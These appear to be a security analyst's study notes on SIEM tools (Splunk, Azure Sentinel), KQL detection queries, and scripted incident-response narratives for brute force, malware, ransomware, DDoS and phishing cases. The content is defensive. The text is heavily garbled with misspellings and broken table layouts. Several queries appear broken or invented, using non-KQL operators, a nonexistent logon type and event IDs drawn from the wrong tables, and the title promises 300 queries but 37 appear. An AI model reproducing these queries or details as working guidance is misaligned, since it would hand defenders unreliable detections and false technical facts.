Hot Actib=vely written data Fast Yes
We can do indexing but we cant
Warm written actvely Partial Yes
Cold Oler data , we cant accet acces it Slower Yes
Frozen It is delated or archived data Archived No

Spliunk risk score or severity of the incident 0-100

Alert or incident types Critical

High
Medium
Low
Info

Licensing option Based on GB/day

Alerts/Case management/UEBA/Threat
Splunk console hunting/SOAR/Admin/Log and reporting

Azure Sentinel ( Query based solution)

Main competetirors re
1) IBM q radar
2) Splunk
3) Securonix
4) Logrhythm
5) Exabeam

Adavatgaes 1) Eacy to deploy

2) Cost or price is less
Based on EPS cpount and storage
3) Elasticity ( Harozonatl agrowth and verticla growth) and GB/day
4) High availbility
5)Threat hitning is nice
6) Threat intelligence feeds
7) Azure sentinel can be integrate dwith Mitre atatck framework

Implementatioj or configuration or administration of Azure

Azure sentinel architecture digram or componets sentinel
Data cinnectors can be used to
intgreate either inbuilt Microsoft
products data sources or log
sourcres and additinoally can be
used to integrate third party log or
data sxources vendors log
integration od data soiucres
1) Data connectors integrations
Example : microsfot EDR
Microsoft 0365 pheinign email
Gatewat
Microsoft Azure security securityu
center
Microsoft servers
Ebd poiunts
Third party Cisco
HP
IBM
Mcafee
Trend Micro
Symantec
Psalo alto
Crodwstrike
Checkpoint

it is guyide or procedureal document

and it wll take care autmatic respose
whenver any security incident is
2) Play books or SOP or Run book triggered under azure sentinel
To create customized coreelation
rule creation for known or unknown
category of the atatcks using KQUL
3) Analytics lanaguagge ( Kusto query language) KQL qeuries
It can be used as a sample query for
threat hutning, play books creation,
correlation rule creation and and
also it is free of cost once we are
4) Azure sentinel community edition ( Github) pruchasing azure sentinel
it is a container that consitis of data
and configuration and also it can be
used for stoing of the logs (
Reentention polivy ) based on
5) Log analytucs or work space business ehreat we are wdoing

Threat management
It provides visualization of data
gatahredred from different data
solurces or log sources and elaso it
si used to enabling security incidents
1) Dashboards investigations
The colelction of evidence related to
specific invetsigation to known or
unonon catrhory of the atatcks
starting from new to closure of the
2) cases incidnent ( Case management)
Hutning of the threats proactiveuly to
care of incident investgation
investigation using manaul or
automated or hypothesis using KWL
3Hutning query laugahe
Sentinel will use third party
notebooks using Jupiter to take care
of unknown categroy of the atatck
suing ML/AI , Behavorial pattern
4) Notebooks mechanism jypiter note books

Licensing options GB/day

deployment Stand alone

Distubted

Implementation Cloud ( SaaaS)

Backend databasees or query language KQL ( Kusto query lanagauge )

Log format CEF

log integration methods 1) Data connector

2) sylog
3) api token method
4) cloud connector method

Threat hunting KQL

UEBA = UBA + EBA
SOAR Microsoft SOAR

0-10 ( Data nalytics, mathematical calualcations and based on

statsiccal approach and based anomlay factor and baxed on
Risk score or severity score type of the attack and based normal and abnormal vents ) Similar to lBM qradar
Critial 8-10
High 6-8
Medium 4-6
Low 2-4
Info 0-2
 Can be used for the deper investigation, threat hutning, sotrage
Log anaytics and retention policy etc

Features or addtional licensing functions 1) UEBA

2)SOAR
3) Deployment server
4) GTI
5) Threat hunting
6)Premium support
7) Storage

Implementation 1) Azure sentinel subscription

2) Region specify
It should not expose to the opublic
3) Management ip and hostname or internet It shpuld access via VPN
4) Subnet mask, default gateway
5) Space or retention
Windows admin or sys admin
6) Integrating of either onpremse AD or azure AD UEBA or network admin
7) Integrate DNS servers Network team
8) Integrate proxy server Network security team
Email admin or network
9) Integrate with SMTP server admin or windows admin
10) Log onbaording ( Datsa conenctors )
11) Verify log boarding issues, admin or cnfig, normalization,
parsing and aggregation, filtering and indexing issues
12) Based on business requirement verify and validate sufficient
out of the box correlation rules are providing sentinel or can we
create customized correlation rules based on our requirement an
dbased regula threat inteligence feeds
13) Verify quertly basis correlation rules auditing alll the rulkes
are utlised or not
14) SOC l1, l2 , L3 operations support, threat hutning, soar and
ueba and reverse engineering etc
14) High avability ( Active passive )
Top 300 Azure Sentinel Used Cases KQL (Kusto Query Language) queries.

1. Failed login attempts:

SecurityEvent
| where EventID == 4625

2. Successful login attempts:

SecurityEvent
| where EventID == 4624

3. Brute-force attacks:
SecurityEvent
| where EventID == 4625
| summarize count() by TargetUserName
| where count_ > <threshold>

4. Account lockouts:
SecurityEvent
| where EventID == 4740

5. User account changes:

SecurityEvent
| where EventID == 4738 or EventID == 4720

6. Privileged account usage:

SecurityEvent
| where EventID in (4672, 4673, 4688) and AccountType == 'User'

7. Suspicious process execution:

SecurityEvent
| where EventID == 4688 and InitiatingProcessCommandLine has_any ('powershell.exe', 'cmd.exe')

8. Data exfiltration:
SecurityEvent
| where EventID == 5145 and AccessMask == '0x2'

9. Network traffic anomalies:

SecurityAlert
| where ProviderName == 'MicrosoftNetworkProtection' and AlertType == 'AnomalousNetworkTraffic'
10. Malware detection:
SecurityAlert
| where ProviderName == 'MicrosoftDefenderATP' and AlertType == 'MalwareDetection'

11. DDoS attacks:

SecurityAlert
| where ProviderName == 'DDoSProtection' and AlertType == 'DDoSGeneric'

12. Suspicious PowerShell activity:

SecurityEvent
| where EventID == 4104 and (CommandLine has_any ('Invoke-Expression', 'Invoke-Script', 'iex'))

13. Unusual account behavior:

SecurityEvent
| where EventID == 4724 or EventID == 4725

14. Privilege escalation attempts:

SecurityEvent
| where EventID == 4672 and NewProcessName contains 'cmd.exe'

15. Failed service principal logins:

AuditLogs
| where OperationName == 'Sign-in by service principal' and ResultType == 'failure'

16. Suspicious Azure AD sign-ins:

AuditLogs
| where ActivityDisplayName == 'Sign-in' and ResultType == 'failure'

17. Unusual lateral movement:

SecurityEvent
| where EventID == 4624 and LogonType == 3

18. Azure resource modifications:

AzureActivity
| where OperationName == 'Microsoft.Resources/subscriptions/resourcegroups/write'

19. Unusual DNS queries:

DnsEvents
| where QueryType == 'A' and isnotempty(QueryName) and notstartswith(QueryName, 'Microsoft')
20. Data access by unusual IP addresses:
SecurityEvent
| where EventID == 4663 and (SourceAddress notlike 'x.x.x.x' and SourceAddress notlike 'y.y.y.y')

21. Large data exports:

AuditLogs
| where OperationName == 'Export' and ResultType == 'success'

22. Unusual process creation:

SecurityEvent
| where EventID == 4688 and (NewProcessParentName != 'C:\Windows\System32\svchost.exe')

23. Suspicious Azure VM operations:

AzureActivity
| where ResourceType == 'Microsoft.Compute/virtualMachines' and OperationName in
('Microsoft.Compute/virtualMachines/write', 'Microsoft.Compute/virtualMachines/delete')

24. Failed SQL Database access attempts:

SecurityEvent
| where EventID == 18456 and LogonType == 8

25. Azure AD user password changes:

AuditLogs
| where ActivityDisplayName == 'Password reset' and ResultType == 'success'

26. Account enumeration attempts:

SecurityEvent
| where EventID == 4625 and FailureReason == 3221225578

27. Suspicious Azure Storage operations:

AzureActivity
| where ResourceType == 'Microsoft.Storage/storageAccounts' and OperationName in
('Microsoft.Storage/storageAccounts/write', 'Microsoft.Storage/storageAccounts/delete')

28. Suspicious PowerShell modules loaded:

SecurityEvent
| where EventID == 4104 and (ParentImage contains 'powershell.exe' or Image contains 'powershell.exe')
29. Failed Exchange mailbox login attempts:
SecurityEvent
| where EventID == 4625 and LogonType == 10

30. Suspicious Azure Key Vault access:

AuditLogs
| where ActivityDisplayName == 'Access granted to Key Vault' and ResultType == 'success'

31. Unusual VPN logins:

SecurityEvent
| where EventID == 4647 and LogonType == 21

32. Failed RDP login attempts:

SecurityEvent
| where EventID == 4625 and LogonType == 10

33. Suspicious Azure Function operations:

AzureActivity
| where ResourceType == 'Microsoft.Web/sites/functions' and OperationName in
('Microsoft.Web/sites/functions/write', 'Microsoft.Web/sites/functions/delete')

34. Unusual Azure AD application registrations:

AuditLogs
| where ActivityDisplayName == 'Add an application' and ResultType == 'success'

35. Suspicious network port scans:

SecurityEvent
| where EventID == 5156 and Port >= 1 and Port <= 1024

36. Failed Azure VM login attempts:

AzureActivity
| where ResourceType == 'Microsoft.Compute/virtualMachines' and OperationName ==
'Microsoft.Compute/virtualMachines/login/action'

37. Unusual Azure NSG rule modifications:

AzureActivity
| where ResourceType == 'Microsoft.Network/networkSecurityGroups/securityRules' and
OperationName in ('Microsoft.Network/networkSecurityGroups/securityRules/write',
'Microsoft.Network/networkSecurityGroups/securityRules/delete')
 Interactive Logon (Logon Type 2)

• This type is used when a user directly logs into the computer at the physical
console or via a graphical interface. It typically involves entering a username and
password.

Network Logon (Logon Type 3)

• This occurs when a user logs on to a system over the network. It includes
accessing shared resources or files on a networked machine.

Batch Logon (Logon Type 4)

• This type is used for scheduled tasks that are set to run automatically without
user interaction, such as a batch job or script running.

Service Logon (Logon Type 5)

• Used by Windows services to log on to the system without requiring user

intervention. Services are background processes like those responsible for
system operations.

Remote Interactive Logon (Logon Type 10)

• This logon type is used when accessing a system remotely, typically through
Remote Desktop Protocol (RDP). It is a method for users to log in remotely to a
machine.

Network Cleartext Logon (Logon Type 8)

• This logon occurs when a user logs in over the network and the password is
transmitted in cleartext (unencrypted), often with older authentication protocols.

Unlock Logon (Logon Type 7)

• This logon occurs when a user unlocks a session that was previously locked,
either manually or by system settings.

Persistence

The adversary is trying to maintain their foothold.

Account Manipulation

Adversaries may manipulate accounts to maintain and/or elevate access to victim

systems. Account manipulation may consist of any action that preserves or modifies
adversary access to a compromised account, such as modifying credentials or
permission groups. These actions could also include account activity designed to
 Multiple authtication log in failure attemots ( Brute force atatck )--- Windows ( End point )

Data source / Log

source Log integration method Log colelctor Log processor / Log Manager SIEM ( dash board/ Alerts)
Domian controller / Collector agent / Windows
End point logs collector agent Aggregation, Parsing and Nomralization Processing of the logs Alerts / Incident / Alarm / Offenses
Filtering TCS SBI SIEM
Indexing HSBC SIEM EDR NGFW Proxy Email GW dlp
Querying
CRE - Multiple authication log in
failure from the same source user
Multiple autication log in faolures
are coming from same source ip ( Basic investigation / False positve vs
Private / Public ) L1 Recommendations true postive
Brute force atatck L2 IR
L3 /SME / Team Threat hutning, UEBA
Dictinary atatck lead analaysis
P1, escalted tickets
NGFW / Proxy logs To verify whether the outbound conenctions or inbopund cinenctions are coming from atatcker to Victim and vice versa Log onboaridng issues
Lateral movement its happend or not Parsing related issues
Previlge esclation attack has done by the atatcker Correlation rule cretion
DLP logs To confirm whether data exfilteration or data breach or data copied by the attacker ITIL
Preparation SIEM tool upgrades
Possible scenarios 1) Internal employee Autication failures False psotive Identification SME / technical
2) External attacker Autication failures Attacker did not succed (False psotive ) Containment SOAR - Automation )
After sevaral attempts and he
3) External atatcker succed True positve Eradication
Recovery
Leannons
learne or post
mattern report
Scenario1 Multiple authetication log in failure attempts - Internal ip /User
1) Email notification / Dash baord of
the SIEM tool
2) Assign the ticket your self /
3) Traiging of the incident Asset profling
User profiling
Attacker profliing Alert

Asset profling Asset name

Os type
Brand model
name
event time
stamp
User profling User name
User ip
Team
Dat source / Log source AD/DC
End point logs

Correlation rule
Correlation rules identication

Payload

AD/DC/End Windows log on

Log analysis point logs type
Windows event
id
Public ip is
existing

Private ip
address
Evidence confirmation
Out bound
conenctions are
not going on
Autication
failure logs
Password
change details

Log sources for Brute force

attack AD/DC or end user system logs

Multiple authentication log in failures with in short span of time (False positve)
Brute force attack to end user system- 1.1.1.1(Public)- External attack

Recently i have done multiple authetication log in failures incident

Option1 1 investigation
Alert is recived through IBM Q radar SEIM dashboard and also from email
2 ntofication.
I went to SIEM dashboard assigned the ticket myself and also acknoledged to
3 other soc team mebers as well
After that i went and i created ticket in the ticketing tool. In my organization we
4 are using Service now ticketing tool for Tracking of the incidents.
After creating ticket in the ticketing tool the i started Traige the information like
IOC, IOA,asset profiling, user profiling. Nothing but I have gathred vitcim IP
5 related details, ip address, username or system name
6 Also I found external attacker ip address details as well
Then i came to know that it is external attack based on the IP address details
7 recived in the alert.
I have done log analysis and also verified the reputation in the tools like MX
tool, Virustotal.com, ip void, ip abuse db found that this activity will happen
8 from the maiclious ip
9 Then I took the ip address and blocked the ip address in the firewall
Finally i attched the evidence in the ticketing tool and metioned the comments
10 or notes in the tool and made summary of the report and closed the incident

Multiple authentication failures with in short span of time (False positve) to end
Option2 Brute force attack user latop- 10.10.10.1 (Private IP)- Internal attack

Recently i have done multiple authetication log in failures incident

1 investigation
Alert is recived through IBM Q radar SEIM dashboard and also from email
2 ntofication.
I went to SIEM dashboard assigned the ticket myself and also acknoledged to
3 other soc team mebers as well
After that i went and i created ticket in the ticketing tool. In my organization we
4 are using Service now ticketing tool for Tracking of the incidents.
After creating ticket in the ticketing tool the i started Traige the information like
IOC, IOA,asset profiling, user profiling. Nothing but I have gathred vitcim IP
5 related details, ip address, username or system name
I found this activity happend from internal IP address and found one of the
6 internal user has done
After gathering the information I have sent an email to end user bacuse i have
access to contact end user and based his confirmation i found that it is intal
7 activity of the internal employee or end user.
I got a conformation mail stating that by mistake end user tried more than 5
8 attempts
I attached mail confiormation as a evidence and made a summary of the
9 report and update the comments and closed the incident

Multiple authentication failures with in short span of time (True positve) to end
Option 3 Brute force attack user laptop- 1.1.1.1- External attack

Recently i have done multiple authetication log in failures incident

1 investigation
Alert is recived through IBM Q radar SEIM dashboard and also from email
2 ntofication.
I went to SIEM dashboard assigned the ticket myself and also acknoledged to
3 other soc team mebers as well
After that i went and i created ticket in the ticketing tool. In my organization we
4 are using Service now ticketing tool for Tracking of the incidents.
After creating ticket in the ticketing tool then i started Traige the information
like IOC, IOA,asset profiling, user profiling. Nothing but I have gathred vitcim
5 IP related details, ip address, username or system name
I found this activity happend from extrenal attacker and i have done the log
anlysis of Domain controller and also some of the victim ip connection keep on
6 communicating atacker ip address.
7 Immediatley i found that legitmiate activity is going on and it is true positive.
As per incident life cycle management process i have done containment after
anlysing BIA (Business impact analysis) and RISK assessment . Because only
8 one user is going impact if i am doing containment
Later i asked windows admin team/ Help desk / service desk to reset the
9 password to stop additional data breach
Then I have run the Av scans and also verified DLP/FW logs is there data
breach happend . Fortunatley there is no data breach happend and data did
10 not copied
Then i bring it back to abnormal to normal operations and connected back to
11 Network
Also as per Lessons learned and psot mattern report phase i created RCA
(Root cause analysis) document and reviewed with SOC manager and also
presented this report with client. In RCA I found that end user did not change
12 default password when he onboarded intially. same password he is using.
13 Also uypdated SOP document
For future reference provided security awareness training to employees and
14 ask them to use the complex and strong passwords.
 Malware (End Point and server)

Data
source /
Log source Log integration method Log colelctor Log processor / Log Manager SIEM ( dash board/ Alerts)
API roken (SaaS) / Sylog Aggregation , Parsing and Alerts / Incident / Alarm /
AV/EDR (Hardware) Normalization Processing of the logs Offenses
Aggregation , Parsing and
NGFW Syslog Normalization Filtering Malware detection Internal user False spotitive
Aggregation , Parsing and
AM Syslog / API token Normalization Indexing External atatcker False Poative
Aggregation , Parsing and End Point or
NIDS/NIPS syslog Normalization Querying Extaernal atatcker True Positive Server
Aggregation , Parsing and
Email GW API toekn / Syslog Normalization CRE engine-----Malware detected
Trojan detected
Virus detected
Abnormal/Malicous / Suspcious pattern bahaiour of the file

End Point - Malware investigation ( Laptop, Mobile, WS, DT, Mac book)

Log source action

1) Internal user - False Block
psotive Log sources are AV/EDR/XDR /Quarantine/dENY/Clean
Block
AM /Quarantine/dENY/Clean
Block
Email GW /Quarantine/dENY/Clean
Block
NGFW/ NIDS/NIPS /Quarantine/dENY/Clean

alert Dash baord / Email nortifcation

Create a ticket Service now
Classify the incident Based ont eh risk score, Severity and also Imapct
Traige Asset profiling User profiling Attacker profling
Asset IP address Victim ip - Private IP Attacker IP
Asset OS User name Attacker country
OS type Team of the name TTP
Model Number
File Name
File size
File category
Hasu value of the file
Dat a cource name / Log source name
Data source action /Log source action
Payload
Event time stamp

External atatcker false

2 postive Loga analysis
Verify the address Legittaimate
Hash value reputation
Domain validation
URL link
Log source action / Dat asource action Block / Qurantine
Verify the outbound conenctions from internal or victim ip to atatcker
C2C communications

External attack -True

3 Postive

Dash baord / Email

alert nortifcation
Create a ticket Service now
Based ont eh risk score,
Classify the incident Severity and also Imapct
Traige Asset profiling User profiling Attacker profling
Asset IP address Victim ip - Private IP Attacker IP
Asset OS User name Attacker country
OS type Team of the name TTP
Model Number
File Name
File size
File category
Hasu value of the file
Dat a cource name / Log
source name
Data source action /Log
source action Allow
Payload
Event time stamp

Investigation analysis Hash value verification

Ip address validation
C2C communication from the vitvim
machine to attacker ip address
One of the END USER SYSTEM (Laptop, Macbook, work station or desktop) got compromised by
Malware Malware
Recently i have done One of the end user system got compromised
1 Malware incident investigation
Alert is recieved through IBM Q radar SEIM dashboard and also
2 from email notifcation.
I went to SIEM dashboard assigned the ticket myself and also
3 acknoledged to other soc team mebers as well
After that i went and i created ticket in the ticketing tool. In my
organization we are using Service now ticketing tool for Tracking of
4 the incidents.
After creating ticket in the ticketing tool the i started Traige of the
information like IOC, IOA,asset profiling, user profiling. Nothing but I
have gathred vitcim IP related details, ip address, username or
5 system name and where the system is located .
I gathered addtionally file name, file size, file category and file
6 extension
This attack recived through . dll file when the user downloaded the
7 file from trojan website
I have done contaiment (As per incident life cycle mgt) from the
network whatever system got compromised after analysing the BIA
8 (business impact analysis) and also Risk assessment.
I have taken the file and analyzed malware analysis in the
Sandboxing environment and finally i came to know that file has
9 malware and also I have taken SHA 256 value
In the eradication phase i deleted the file from the end user machine
and re run the AV scans and also changed the passwors by
10 contacting the helpdesk/service desk team.
In the recovery phase bring it back from abrnomal to normal
11 operations
In the Lessons learned phase as a post motern report i have
preparared root cause analysis document and finaly i analyzed why
, how and when it is got comrpomised. That reason behind for
compromise regularly Windows patch updates are not happening
and also AV agent sleeping when the attach happend due to this
reason when the user downloaded .dll file from trojan or illigitimate
12 website system gotcompromised.
 I reviewed RCA document with SOC manager and preseted to my
13 client or customer
Due to this reason i got an appreciation email and also selected for
monthly award due to my productvity and quality of the Incidents i
14 was handling
Server - Malware investigation ( Windows, Unix, Middleware , Webserver or DB server etc)

1) Internal user - False Block

psotive Log sources are AV/EDR/XDR /Quarantine/dENY/Clean
Block
AM /Quarantine/dENY/Clean
Block
NGFW/ NIDS/NIPS /Quarantine/dENY/Clean

alert Dash baord / Email nortifcation

Create a ticket Service now
Classify the incident Based ont eh risk score, Severity and also Imapct
Traige Asset profiling User profiling
Asset IP address Victim ip - Private IP
Asset OS User name
OS type Team of the name
Model Number
File Name
File size
File category
Hasu value of the file
Dat a cource name / Log source name
Data source action /Log source action
Payload
Event time stamp

External atatcker false

2 postive Loga analysis
Verify the address Legittaimate
Hash value reputation
Domain validation
URL link
Log source action / Dat asource action Block / Qurantine
Verify the outbound conenctions from internal or victim ip to atatcker
C2C communications

External attack -True

3 Postive

Dash baord / Email

alert nortifcation
Create a ticket Service now
Based ont eh risk score,
Classify the incident Severity and also Imapct
Traige Asset profiling User profiling Attacker profling
Asset IP address User role Attacker IP
Asset OS User name Attacker country
OS type Team of the name TTP
Model Number
File Name
File size
File category
Hasu value of the file
Dat a cource name / Log
source name
Data source action /Log
source action Allow
Payload
Event time stamp
Assetname / Sustem name /
Computername /FQDN appprodcts.com
devdbcts.com
Mirrortestcts.com

Whether the server is blongs to internal

1) facing dserver or itnernet facing server ?
How many end users are accessing the
2) server ?
Redudancy
3 Is there any back upo srerver ? server Back up server
4) Are you taking regular back ups ? SAN
NAS
Veem
Microsoft cloud
Googlre cloud
Maganetic taps
5) What is crticalisty of the server?
Is there any condifential data is toring on
the server ? is there any PII DATA OR
6) phi DATA IS STORING ?
oN TOP OS THE SERVER IS THERE
7 ANY application are running on ?
If we are doing containment is there any
availibility impact oroutage impact to tne
8 users and also public ?
 Ransomware (End Point and server)

Data source /
Log source Log integration method Log colelctor Log processor / Log Manager SIEM ( dash board/ Alerts)
AV/EDR API roken (SaaS) / Sylog (Hardware) Aggregation , Parsing and Normalization Processing of the logs Alerts / Incident / Alarm / Offenses
NGFW Syslog Aggregation , Parsing and Normalization Filtering Malware detection
AM Syslog / API token Aggregation , Parsing and Normalization Indexing
NIDS/NIPS syslog Aggregation , Parsing and Normalization Querying
Email GW API toekn / Syslog Aggregation , Parsing and Normalization CRE engine-----Malware detected
Trojan detected
Virus detected
Abnormal/Malicous / Suspcious
pattern bahaiour of the file

One of the END USER SYSTEM (Laptop, Macbook, work station or desktop) got compromised
Ransomeware by Ransomeware
Recently i have done One of the end user system got compromised by ransomeware incident
1 investigation
2 Alert is recieved through IBM Q radar SEIM dashboard and also from email notifcation.
I went to SIEM dashboard assigned the ticket myself and also acknoledged to other soc team
3 mebers as well
After that i went and i created ticket in the ticketing tool. In my organization we are using Service now
4 ticketing tool for Tracking of the incidents.
After creating ticket in the ticketing tool the i started Traige of the information like IOC, IOA,asset
profiling, user profiling. Nothing but I have gathred vitcim IP related details, ip address, username or
5 system name and where the system is located .
6 I gathered addtionally file name, file size, file category and file extension
This attack recived through . dll file when the user downloaded the file from trojan website. As per
7 cyber kill chain process couple of files got infected and system got compromised.
I spoke with Help desk team whether they are taking regular back ups or not. Fortunately help desk
8 team/ Corporate IT team taking regular back ups.
I have done contaiment (As per incident life cycle mgt) from the network whatever system got
9 compromised after analysing the BIA (business impact analysis) and also Risk assessment.
In the eradication phase with the help of service desk team formatted the system and re run
10 the AV scans.
11 In the recovery phase bring it back from abrnomal to normal operations
In the Lessons learned phase as a post motern report i have preparared root cause analysis
document and finaly i analyzed why , how and when it is got comrpomised. That reason behind for
compromise regularly Windows patch updates are not happening and also AV agent sleeping when
the attach happend due to this reason when the user downloaded .dll file from trojan or illigitimate
12 website system gotcompromised.
13 I reviewed RCA document with SOC manager and preseted to my client or customer
Due to this reason i got an appreciation email and also selected for monthly award due to my
14 productvity and quality of the Incidents i was handling

Ransomeware One of the SERVER got compromised by Ransomeware

1 Recently i have done One of the server got compromised ransomware incident investigation
2 Alert is recieved through IBM Q radar SEIM dashboard and also from email notifcation.
I went to SIEM dashboard of offenses and assigned the ticket to myself and also acknoledged to
3 other soc team members as well
After that i went and i created ticket in the ticketing tool. In my organization we are using Service now
4 ticketing tool for Tracking of the incidents.
After creating ticket in the ticketing tool the i started Traige of the information like IOC, IOA,asset
profiling, user profiling. Nothing but I have gathred vitcim IP related details, ip address, username or
5 system name and where the system is located .
6 I gathered addtionally file name, file size, file category and file extension
This attack recived through . dll file when the windows server admin downloaded the file from trojan
7 website
After that i went and i created ticket in the ticketing tool. In my organization we are using Service now
8 ticketing tool for Tracking of the incidents.
This is escalated priority 1 (P1 ) ticket and scheduled a call with Asset owner and asked couple of
9 questions before doing the containment(Network isolation)
a) Is there any back up server is available?
b) are you taking any regular back up config?
c) are there any critical applications are runing on top of this server ?
d) How many users are going to pmact incase if we are taking network isolation or containment?
I got below answers from the asset owner or server owner
a) Yes back up server is availble and it is facing internet and it is a critical server to the organization
b) Yes, Regular back ups they are taking as a veem
c) yes critical legacy applications are running ( Basic java based application developved long back)
d)large number of users are going to impact .
Based on the server owner confirmation and details, i made back up server as a primary and
10 continued the business operations without impacting any users.
11 whatever server got compromised i have done network isolation in the comntainment phase .
In the eradication phase with the help of windows server team formatted the server and imported the
12 back up config file from back up file and brining it back to normal operation as a high availbility.
13 Finally I brought it back to high availbility with in the SLA 4 hours defined in the recover phase.
In the Lessons learned phase as a post motern report i have preparared root cause analysis
document and finaly i analyzed why , how and when it is got comrpomised. The reason behind for
compromise regularly Windows patch updates are not happening and also AV agent sleeping when
the attack happend . Due to this reason when the user downloaded .dll file from trojan or illigitimate
14 website system got compromised.
I reviewed with Lessons learned document with SOC manager and presented to my client or
15 customer
Due to this reason i got an appreciation email and also selected for monthly award due to my
16 productvity and quality of the Incidents i was handling
 One of the system is got compromised and it keeps on contacting to command and control server (C2C)

Data source /
Log source Log integration method Log colelctor Log processor / Log Manager SIEM ( dash board/ Alerts)
All log spurces All log integration methoids Aggragtion, Parsing and normalization Indexing EMail notifcation alert
Filterting
Querying
CRE Engine - All category of the atatcks

1) Create a ticket
Classfiy the icnident ( Based on the correlation rule
2) name) True postive
3) Trriage
Asset profling User profling Attacker prolfing

Confirmation of false psotive or Tryue 1) Outbound connections from internal ip to

positve external ip Firewall logs
conatct with
2) Ip address validation Non bunsiness ip and it is malcious ip network admin
3) Hash value validation (If the alert is malware )
4) Malcious URL ( If the alert has any URL logs)
5)Payload
6) Domain
 OWASP TOP 10

Data source / Log source Log integration method Log colelctor Log processor / Log Manager SIEM ( dash board/ Alerts)
DB server Collector agent / Syslog Alert or Ofense, Alram or SEcurity incident
App server/ Web server Collector agent / Syslog
WAF Syslog / API token
NGFW ( waf) Syslog Aggregation, Normalization
Application (API) API token (Apps) and parsing Indexing, Querying, Filtering and CRE engine

1) Internal User false psotive Aunthiteication failure

2) External atatcker false psotive OWASP TOP 10

Apllication 3 tier architerure

3) External atatcker true psotive Broken authtication User layer or Front end Business or logica, layer DB layer
Broken access control
Injecttion flaw attack
XSS or CSS
FOrgery (CSRF or SSRF)

Input validation ieeu Speak with developers User name Input validation
Patramterised
Paassword qieries
Like
share
comment
Feedback
summry

DB layer
 Impossibel traversal attack from different graphical locations

Data source / Log

source Log integration method Log colelctor Log processor / Log Manager SIEM ( dash board/ Alerts)

Use case or Practical

scenarios VPN
SSO (OKTA, Microsoft identity, Ping
identify , IBM, Cyber ark etc )

NGFW Syslog
AD/DC Collector agent
Application logs /
Web server logs API, Syslog
Systtem / Computer Colllector agent Parsing, aggragation and Querying , indexing , Filtering , CRE
VPN tools Syslog Nrmalization engine
Dash abord/ Email notifcstion

VPN impossible traversal atatck False spotive

Asset profling User rpfoling Attacker profling
atatcker ip
Asset anem /Computer name / System name User name address
Location of the
Asst location Ip addresss atatcker
Event tiem astamp Location s TTP
Payload
Log source / Dat asource
Block/ Deny/
Packet dropped
/ Packet Reset
/ Packet
Log source action / data slource action retransmitted
Authication success or fialure
Attacker ip 57.128.222.4 LT
57.128.224.5 Mac

Internal user 10.10.10.1 Chanti Malysia

India
Hongkong
Singepore

True Positive
1) Alert will be triggered int eh SIEM tool dashbaord or EMail notifcation
2) Assignin the ticket and create ticket in the ITSM tool
Traigeing of the incieent
Attacker
User proflig Asset prifling profiling

User name OS type Atatcker ip

Location Model nuber Attacker country
Data source System/Comput
name / Log er name /
source name FQDN TTP
Event time tiem
stamp
Victim IP
Dat source /
Log source
action
Pyaload
Firewall policy
VPN policy

Open source
tools /
Attacker ip address reputation Commecriasl
Victim ip to
atatcker or C2C
communication
C2C comminication /0 as aoutound

Successful
authtication
from the
atatcker ip
VPN logs / NGFW logs address Allow
Packet allow
Logsource / data source action Allow
 DoS / DDoS ( All OSI layers )

Data source / Log source Log integration method Log colelctor Log processor / Log Manager SIEM ( dash board/ Alerts)
Syslog/API / Cloud
Anti DOS / Anti DDOS connector
NGFW Syslog
nids/nips Syslog
Filtering, indesing, quering , CRE :
Server Colelctor agent / Syslog Aggregartion, parsing and TCP, UDP, ICMP, MAC, ARP, RARP,
WAF Syslog / API normalization DOS, DDOS Dash abord/ Email
SWG Sylog / API

nternal user - False

DOS attack spotive User profiling Asset prolifng
User name Asset name
Ip address Asset os
Model number
Log dource / Data source naame of the asset
Log source / data source action Deny/Locked/Block Location asset
Payload
Paload

Extyerbal atatck - False

DOS attack spotive User profiling Asset prolifng Attacker info
User name Asset name Attacker ip
Ip address Asset os Location ip
Model number
Log dource / Data source naame of the asset Country
Log source / data source action Deny/Locked/Block Location asset TTP
Payload
Paload

Exaternal attack from

True positve User profiling Asset prolifng Attacker info
User name Asset name Attacker ip
Ip address Asset os Location ip
Model number
Log dource / Data source naame of the asset Country
Log source / data source action Alloow / Packt is llaowed Location asset TTP
Payload
Paload

Verify the outbound conenctions from the vitiim ip non business ip /

External Ip's

1) End point Containemtn

2) Server/DB/Application/Cloud instance BIA / RM

DDOS Internal user false postive

External atatcker false spotive
External attcker ddos true positve End user Containment
We should go
and we should
asl business
DB/Middle ware/windows/Linux / App/ product / OT/ Cloud instance owneer
 Phishing email Incident investigation
Log source /Dats source Log integration Log Collector Log Mangaer siem
SMTP server API token /Collector agent Aggregation Indexing aAlert/Incident/Alaram/Offense
Email GW API token / Syslog Parsing Querying
NGFW Syslog Nomrlization Filtering
Proxy Syslog / API toek menthod CRE
EDR/AV/XDR API toek / Sylogs

Phsihing email investigation woithout SIEM too Type of the phsiing

False psotive
True psotive

Phsihing email investigation With SIEM tol

Possible scenarios 1) Genric Phsining email

2) Pear phishing email
2) Whaling
3) Malcious URL link single user or group of th user
4)Malcious Malware investigation
5) QR code ( Malware)
6) Single attacker sent phsiing email to single user Multiple
7) SIngle pshing email atatcker sent the phsiiing email to groupor
the user Multiple
8) Single phisij g phsiing email atatcker sent an email to single
user using Malisous url link Multiple
9) Single phsiing email sent to mu,pleit user using malcious url
link Multiple
10) SIngle pshijg email attacker sent a phning e,ail using
malware attachment ( QR code) to single user Multiple
11) Single phsing email atatcker sent an email to mulitple users (
QR code or any other file)

It is authentication method or mechians and it can be used to

spf (Sender policy framework ) prevent email spoofing of the atatcks

It is an authtication protocol ( Rule or regulation or logic or

algortihm ) to allow or block or prevent email apoosing of the
DMARC atatcks

DKIM SPF+DMARC

Attacker will trick the end user by sending an email and he will
Phsihing email again uinthorised access or sensitive data exposure

How can we identify or suspect Lottery email

Job opportunity emails
gift card
voucher card
invoice copies
Malaicious malware attachments
Mailicous url links
Spelling mistakes
adult content

Types of phsihing spear phsihing - Email will send it to single user or group of users
whaling- Bioard of directors or senior managemnt or CTO, CIO,
CEO, CFO, CISCO , VP, Directore
vishing- By phone call
smishing-Through messages or sms
Malcious Attachment- Mailcious attachment via email
Mailicous URL link

Tech Paramters Non tech

Email contains Tech Paramters Sender email address to
Recipnt email email address cc
send ip bcc
recipent ip subject line
DMARC
DKIM
DK
SPF
Return path
header analyzer

Email gateways or email security Proof Point

Iron Port
Mimecast
O365- ATP
Trianz

1) Generic Phishing email

1) Domain validation 1) Malilicous
a) Tale the malcious domain and block the doamin in the NGFW,
EMAIL GW, DNS server or Proxy or SMTP sevrer
b)Incase the domain is non malcious one then go to further
investigations

2) Ip validation take the ip address and check the reputation

1) If it is malciousd ip address block the ip address int eh firewall
side
